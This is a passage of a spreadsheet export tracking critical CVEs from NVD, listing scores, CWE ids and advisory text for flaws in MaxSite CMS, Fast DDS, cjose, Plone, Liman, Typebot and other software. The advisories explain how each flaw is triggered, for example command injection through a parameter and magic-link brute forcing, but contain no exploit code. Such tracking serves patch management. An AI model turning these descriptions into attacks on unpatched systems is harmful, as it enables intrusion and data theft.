          <t>MaxSite CMS through 109.6 passes the ci_session cookie to unserialize() without class restrictions, allowing unauthenticated attackers to inject PHP objects. Attackers can forge valid session cookies using the hardcoded encryption key to trigger magic methods and corrupt application state or achieve code execution if gadget classes exist.</t>
        </is>
      </c>
      <c r="S126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87930</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-51679</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr"/>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr"/>
      <c r="Q127" s="5" t="inlineStr">
        <is>
          <t>CWE-1281</t>
        </is>
      </c>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in openRISC OR1200 commit 83ac6b. A mismatch between the RTL and netlist can lead to unexpected behavior.</t>
        </is>
      </c>
      <c r="S127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-51679</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16272</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr"/>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr"/>
      <c r="Q128" s="5" t="inlineStr">
        <is>
          <t>CWE-348</t>
        </is>
      </c>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>Use of less trusted source vulnerability in PayTR Payment and Electronic Money Institution Inc. PayTR Virtual Pos iFrame API (v9x) WHMCS Module allows Exploitation of Trusted Identifiers.
This issue affects PayTR Virtual Pos iFrame API (v9x) WHMCS Module: from v9.0.0 before v9.0.3.</t>
        </is>
      </c>
      <c r="S128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16272</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-22590</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr"/>
      <c r="K129" s="5" t="inlineStr"/>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr"/>
      <c r="Q129" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-131</t>
        </is>
      </c>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>eprosima Fast DDS is a C++ implementation of the DDS (Data Distribution Service) standard of the OMG (Object Management Group). Versions prior to 2.6.12, 2.14.6, 3.2.4, 3.3.1, and 3.4.2 have a remotely triggerable Out-of-Bounds Read while processing RTPS `DATA_FRAG` submessages. An attacker can craft a `DATA_FRAG` with a large `sampleSize` but a small actual payload, and set `fragmentsInSubmessage` such that the receiver treats the packet as the LAST fragment**. In this LAST-fragment path, Fast-DDS computes `incoming_length` based on `sampleSize` and calls `memcpy()` without validating `incoming_data.length &gt;= incoming_length`. As a result, `CacheChange_t::add_fragments()` reads past the received UDP datagram buffer and into adjacent heap memory, copying those bytes into the reassembly buffer. In a Discovery Server deployment, the resulting `CacheChange_t` can be relayed to other participants, meaning that a newly joining participant may receive leaked heap memory (e.g., pointer values that could aid ASLR bypass). Versions 2.6.12, 2.14.6, 3.2.4, 3.3.1, and 3.4.2 fix the issue.</t>
        </is>
      </c>
      <c r="S129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-22590</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41869</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr"/>
      <c r="K130" s="5" t="inlineStr">
        <is>
          <t>apache:nutch</t>
        </is>
      </c>
      <c r="L130" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr"/>
      <c r="Q130" s="5" t="inlineStr">
        <is>
          <t>CWE-404, CWE-862</t>
        </is>
      </c>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization, Improper Resource Shutdown and Job Interruption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S130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41869</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49849</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr"/>
      <c r="K131" s="5" t="inlineStr"/>
      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr"/>
      <c r="Q131" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>xShop is an open-source shop developed in Laravel. An Unrestricted File Upload vulnerability in xShop version 3.0.3 allows an authenticated administrator to upload executable files (e.g., .php). By uploading a specially crafted php file, an attacker can achieve Remote Code Execution (RCE) on the server, leading to a full system compromise. Version 3.0.4 fixes the issue.</t>
        </is>
      </c>
      <c r="S131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49849</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52766</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr"/>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr"/>
      <c r="Q132" s="5" t="inlineStr">
        <is>
          <t>CWE-276, CWE-862</t>
        </is>
      </c>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. Prior to version 4.6.6, the {{erasespamedcomments}} wiki action (actions/EraseSpamedCommentsAction.php) accepts a suppr[] array from POST and deletes every wiki page whose tag appears in that array, with no authorization check anywhere in the action body or in the page-deletion path it invokes. Combined with YesWiki's allow-by-default action ACL model, any user who has page write access, which is the default for everyone (default_write_acl='*') on a fresh install can permanently delete arbitrary wiki pages, including the front page, admin pages, and pages owned by other users. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="S132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52766</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53939</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr"/>
      <c r="K133" s="5" t="inlineStr"/>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr"/>
      <c r="Q133" s="5" t="inlineStr">
        <is>
          <t>CWE-321, CWE-330</t>
        </is>
      </c>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>OpenIDC/cjose is a C library implementing the Javascript Object Signing and Encryption (JOSE). In versions 0.6.1 through 0.6.2.5, when cjose encrypts a JWE using an AES-CBC-HMAC content-encryption algorithm (`A128CBC-HS256`, `A192CBC-HS384`, or `A256CBC-HS512`) together with any key-management algorithm that generates a fresh content-encryption key (CEK), the CEK is all zero bytes instead of being randomly generated. The resulting JWE is therefore encrypted and authenticated under a fixed, publicly known key, so anyone who obtains the JWE can recover the plaintext and forge or modify the content. This is fixed in version 0.6.2.6 by `_cjose_jwe_set_cek_aes_cbc()` generating the CEK from `RAND_bytes`. A regression test asserts that the `encrypted_key` differs across two encryptions for each AES-CBC-HMAC variant. Until upgrading, for data encrypted with cjose, three options are available. Use an AES-GCM `enc` (`A128GCM` / `A192GCM` / `A256GCM`) instead of an AES-CBC-HMAC `enc`,  use `alg=dir` with a caller-supplied CEK, or avoid using cjose for JWE encryption with the affected algorithm pair. These are mitigations for new ciphertexts only; data already encrypted under the zero key remains compromised and should be re-encrypted (and any secrets it contained rotated).</t>
        </is>
      </c>
      <c r="S133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53939</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55247</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr"/>
      <c r="K134" s="5" t="inlineStr"/>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr"/>
      <c r="Q134" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>plone.app.event provides the event content type for Plone. Prior to versions 5.2.4 and 6.0.1, the iCalendar import in src/plone/app/event/ical/importer.py accepts insufficiently restricted calendar and event URLs, does not adequately bound downloaded bytes or imported events, and commits work per event. A logged-in editor can make the server request internal network resources or local calendar files, exhaust resources and take the site offline, and store a malicious event URL that executes script in another user's browser. The fix restricts accepted URLs, applies MAXIMUM_ICAL_IMPORT_SIZE_BYTES and MAXIMUM_ICAL_IMPORT_EVENTS limits, uses transaction savepoints, and validates event URLs. This issue is fixed in versions 5.2.4 and 6.0.1.</t>
        </is>
      </c>
      <c r="S134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55247</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55248</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr"/>
      <c r="K135" s="5" t="inlineStr"/>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr"/>
      <c r="Q135" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>plone.app.portlets provides portlets and a Plone-specific user interface for plone.portlets. Prior to 5.0.8, 6.0.4, and 7.0.2, a member who can add an RSS portlet can set its feed URL to a very large response, causing src/plone/app/portlets/portlets/rss.py to download and retain excessive data in memory and deny service. The same RSS URL handling accepts internal hosts, IP addresses, single-word domains, and explicit ports, allowing server-side requests that can probe internal network services and open ports. A malicious feed item can also supply a JavaScript URL that is retained as the item link and can execute script when used by a victim. The affected logic includes _rss_feed_url_validator, _normal_url_validator, RSSFeed._retrieveFeed, RSSFeed._buildItemDict, and the FEED_DATA in-memory cache. This issue is fixed in versions 5.0.8, 6.0.4, and 7.0.2.</t>
        </is>
      </c>
      <c r="S135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55248</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55536</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr"/>
      <c r="K136" s="5" t="inlineStr"/>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr"/>
      <c r="Q136" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-625</t>
        </is>
      </c>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, Browser Server _handle_connection() checks Chrome extension origins with re.match() and the unanchored expression chrome-extension://[a-z0-9]{32}. Extra trailing characters pass before websocket.accept(), allowing start_session commands and unauthorized browser automation. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="S136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55536</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55640</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr"/>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr"/>
      <c r="Q137" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>Nextcloud MCP Server is a production-ready MCP server that connects AI assistants to a Nextcloud instance. Prior to 0.117.2, the POST /webhooks/nextcloud endpoint in nextcloud_mcp_server/vector/webhook_receiver.py has no authentication by default because WEBHOOK_SECRET defaults to None and startup validation does not require it. When WEBHOOK_SECRET is unset, handle_nextcloud_webhook() accepts unauthenticated requests. The payload["user"]["uid"] field parsed in nextcloud_mcp_server/vector/webhook_parser.py is attacker-controlled and is used without an authenticated-session cross-check for Qdrant operations, allowing a network attacker to delete or trigger re-indexing of vector embeddings for any user and to destroy the semantic search index by sending forged deletion events. This issue is fixed in version 0.117.2.</t>
        </is>
      </c>
      <c r="S137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55640</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57499</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr"/>
      <c r="Q138" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-78</t>
        </is>
      </c>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>Liman is open source server management software. Prior to 2.2.2 - 1103, an OS command injection vulnerability in the log rotation configuration endpoint allows an authenticated administrator to execute arbitrary operating system commands on the Liman server. The `ip_address` parameter is embedded directly into a shell command without sanitization, enabling shell escape via single-quote injection. This is fixed in 2.2.2 - 1103.</t>
        </is>
      </c>
      <c r="S138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57499</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58400</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr"/>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr"/>
      <c r="Q139" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-94</t>
        </is>
      </c>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>GeoNetwork is a catalog application to manage spatially referenced resources. Prior to versions 4.4.12 and 4.2.17, the Saxon XSLT processor used to render formatters is configured without secure processing (`FEATURE_SECURE_PROCESSING`) and without disabling Java extension functions (`ALLOW_EXTERNAL_FUNCTIONS`). Any stylesheet loaded by GeoNetwork can therefore invoke
`java.lang.Runtime.exec()` or `java.lang.ProcessBuilder` directly, achieving arbitrary command execution as the GeoNetwork process user. A user with sufficient privileges to upload a formatter can deliver a `.xsl` file containing Java extension call that execute arbitrary OS commands with the privileges of the GeoNetwork process. The issue is patched in GeoNetwork versions 4.4.12 and 4.2.17.</t>
        </is>
      </c>
      <c r="S139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58400</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62862</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr"/>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr"/>
      <c r="Q140" s="5" t="inlineStr">
        <is>
          <t>CWE-307, CWE-330</t>
        </is>
      </c>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>Typebot is an open-source chatbot builder. In self-hosted versions up to and including 3.17.1, the default passwordless email magic-link authentication is vulnerable to login-code brute forcing that leads to account takeover. The email provider overrides NextAuth's default cryptographically secure token with a 6-digit code generated using Math.random(), reducing the keyspace to 900,000 with a 10-minute expiry, and the code itself is the raw value placed in the magic link. The verification callback enforces no attempt limit, lockout, or CSRF protection, and an incorrect guess does not consume the real code because the adapter returns null on a not-found token, so a valid code survives unlimited guessing within its lifetime. The only rate limiter applies to the code-sending path and is keyed on the client-controlled X-Forwarded-For header, allowing an attacker to request many concurrent live codes for one victim and further raise the odds of a matching guess. As a result, an anonymous attacker who knows a victim's email address can brute-force the callback and obtain an authenticated session as that user with no victim interaction, gaining full access to the victim's bots, results, and connected integration credentials. Deployments configured for OAuth or SSO only, with no email provider, are not affected. This issue is fixed in version 3.18.0</t>
        </is>
      </c>
      <c r="S140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62862</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73253</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr"/>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr"/>
      <c r="Q141" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
